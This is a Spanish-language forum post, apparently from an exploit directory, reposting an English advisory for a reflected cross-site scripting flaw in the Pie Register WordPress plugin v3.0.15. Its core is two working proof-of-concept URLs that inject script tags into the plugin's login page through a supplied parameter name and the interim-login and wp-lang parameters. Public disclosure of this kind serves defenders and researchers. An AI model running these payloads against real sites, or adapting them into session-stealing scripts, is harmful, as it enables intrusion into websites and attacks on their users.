Mostrando resultados del 1 al 1 de 1

Tema: [Bug] Pie Register v3.0.15 (WP Plugin) - XSS Vulnerability [by Socket_0x03]

  1. #1
    Habitual Avatar de Socket_0x03
    Fecha de Ingreso
    mayo-2007
    Ubicación
    Ciberespacio
    Mensajes
    221
    Gracias obtenidos: 58

    Post [Bug] Pie Register v3.0.15 (WP Plugin) - XSS Vulnerability [by Socket_0x03]

    Código:
             =====================================================================================
             Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Login
             =====================================================================================
    
    ____________________________________________________________________________________
    
    
     # Exploit Title: Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Login
    
     # Date: [10-03-2018]
    
     # Category: Webapps
    ____________________________________________________________________________________
    
    
     # Author: Socket_0x03 (Alvaro J. Gene)
    
     # Email: Socket_0x03 (at) teraexe (dot) com
    
     # Website: www.teraexe.com
    
    ____________________________________________________________________________________
    
    
     # Software Link: https://wordpress.org/plugins/pie-register
    
     # Plugin: Pie Register
    
     # Version: v3.0.15 (last version)
    
     # File: login
    
     # Parameters: interim-login, wp-lang, and supplied URL.
    
     # Language: This application is available in English language.
    
     # Plugin Description: Pie Register is a WordPress plugin that an administrator can 
       use to create different kinds of forms without programming knowledge. In addition, 
       an administrator can use Pie Register for payment features; for example, if an 
       administrator is using Pie Register to provide some kind of service, he/she can
       charge an amount to his/her users via PayPal.
       
    ____________________________________________________________________________________
    
    
     #  Cross-Site Scripting Vulnerability:
     
        Name of an arbitrarily supplied URL parameter:
        http://www.website.com/wordpress/index.php/login/?frfqq"><script>alert(23)</script>rwhn7=1
    
        Parameters interim-login and wp-lang:
        http://www.website.com/wordpress/index.php/login/?redirect_to=http%3A%2F%2Fwww.website.com%2Fwordpress%2Findex.php%2F2018%2F09%2F27%2Fhello-world%2F&interim-login=zuhke"><script>alert(23)</script>v1ig9&wp_lang=en_US
    
    ____________________________________________________________________________________
    
     #  More:
    
        https://0day.today/exploit/31255
    Última edición por Socket_0x03; 10-oct-2018 a las 18:08
    [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]

Temas Similares

  1. [Bug] Tekno.Portal v0.1b - XSS Vulnerability [by Socket_0x03]
    By Socket_0x03 in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 26-sep-2018, 19:11
  2. Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
    By Doddy in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 14-mar-2009, 01:58
  3. Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
    By Doddy in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 14-feb-2009, 01:53
  4. Respuestas: 0
    Último mensaje: 31-oct-2008, 09:30
  5. Respuestas: 0
    Último mensaje: 13-sep-2008, 11:21

Normas de Publicación

  • No puedes crear nuevos temas
  • No puedes responder mensajes
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •